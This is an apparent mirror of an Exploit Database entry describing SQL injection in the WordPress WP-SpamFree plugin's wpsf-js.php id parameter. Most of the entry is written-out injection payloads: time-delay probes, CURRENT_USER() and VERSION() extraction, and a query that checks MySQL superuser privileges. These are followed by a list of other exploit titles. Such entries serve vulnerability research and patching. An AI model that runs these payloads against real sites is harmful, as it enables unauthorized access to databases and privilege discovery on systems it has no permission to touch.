WordPress Plugin WP-SpamFree Spam Plugin – SQL Injection

Exploit Database
14 阅读

作者： cheki

日期： 2011-10-11
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17970/

#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-09-25
#Author: [cheki]
#Version:[3.2.1]
#Tested on:[linux]
#Used: ["sqlmap"]
#SQL Injection
http://<target>/wp-content/plugins/wp-spamfree/js/wpsf-js.php?id=1

#Exploit:id=-1; WAITFOR DELAY '0:0:5';-- or id=-1 AND SLEEP(5)

#[http://<taget>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][CURRENT_USER()

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][SELECT (CASE WHEN ((SELECT super_priv FROM
mysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

#http://<target>:80/wp-content/plugins/wp-spamfree/js/wpsf-js.php][GET][id=-1][MID((VERSION()),1,6)

#Home page: http://hacking.ge/

last Exploits
WordPress Plugin WP-SpamFree Spam Plugin – SQL Injection的更多信息

Jenkins Plugin Script Security < 1.50/Declarative < 1.3.4.1/Groovy < 2.61.1 - Remote Code Execution (PoC)：
b2evolution 6.11.6 – ‘tab3’ Reflected XSS：
Synology DiskStation Manager (DSM) < 6.1.3-15152 - 'forget_passwd.cgi' User Enumeration：
Uiga Fan Club – SQL Injection：
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 – Arbitrary File Download：
HiSilicon video encoders – RCE via unauthenticated upload of malicious firmware：
PHP-Nuke 5.0 – Viewslink SQL Injection：
PHP Advanced Transfer Manager 1.10 – Arbitrary File Upload：